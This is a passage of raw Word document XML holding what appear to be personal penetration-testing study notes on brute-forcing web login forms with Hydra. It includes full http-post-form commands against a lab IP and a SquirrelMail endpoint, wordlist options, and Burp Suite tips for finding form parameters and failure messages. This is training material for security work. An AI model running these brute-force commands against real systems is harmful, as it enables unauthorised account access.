                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId358"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7824192" cy="1604963"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001296">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was the correct one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001297">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Took like 9 minutes though</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001298">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want a username wordlist</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000129B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="552"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-L user.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000129C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="552"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, capitalize L</w:t>
      </w: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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want a single password instead of wordlist:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000129F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-P rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p password123</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="624"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, don't capitalize p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Old (don't think this works):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1286"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 15.1.3. HTTP POST Login Form</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1286"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-P /usr/share/wordlists/rockyou.txt -e nsr 192.168.50.201 http-post-form "/index.php:fm_usr=^USR^&amp;fm_pwd=^PASS^:Login failed. Invalid"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1286"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it sees "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login failed. Invalid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" then it knows the password is invalid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1286"/>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admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012AA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L [insert username] -P [insert password list] -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> [insert machine IP] </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http-post-form </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"/squirrelmail/src/redirect.php:login_username=^USER^&amp;secretkey=^PASS^:incorrect" -t 20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is for one username and multiple passwords (password list)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it sees "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login failed. Invalid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" then it knows the password is invalid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L [insert username list] -P [insert password list] -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> [insert machine IP] </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http-post-form </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"/squirrelmail/src/redirect.php:login_username=^USER^&amp;secretkey=^PASS^:incorrect" -t 20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for multiple usernames and multiple passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The http-post-form is for POST requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You might sometimes need to add in a cookie. For example, if you intercept a request and you see the words "__VIEWSTATE", then you will want to add that into your hydra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a colon to the end of the end of the URL endpoint, and then past that cookie in, and then add a colon to the end of the cookie and add the failure message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/squirrelmail/src/redirect.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the endpoint where you send the POST requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Don't just look at the URL. Test a random example, intercept using burp suite, and on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">top</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, you will see something like "/squirrelmail/src/redirect.php". Because on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">log in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page, the URL will be like "/squirrelmail/src/login.php", which is wrong. So, use burp suite to find correct endpoint for log in. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> To find the proper parameter names for username and password, use Burpsuite and intercept a request again. On the bottom, you should see the parameters names. As above, we saw "login_username" and "secretkey"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: After the password, add ":incorrect", or replace incorrect with the correct error message. To find this, don't use BurpSuite, but just try a wrong username and password and then see what error pop up you get. Look for keywords like failure or incorrect or invalid, and then use whatever you see for this argument</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"-t 20" is just specifying how many concurrent thread there should be, to speed it up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2zv4rbrfoa56" w:id="154"/>
      <w:bookmarkEnd w:id="154"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password lists</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012BA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some Password wordlists include:</w:t>
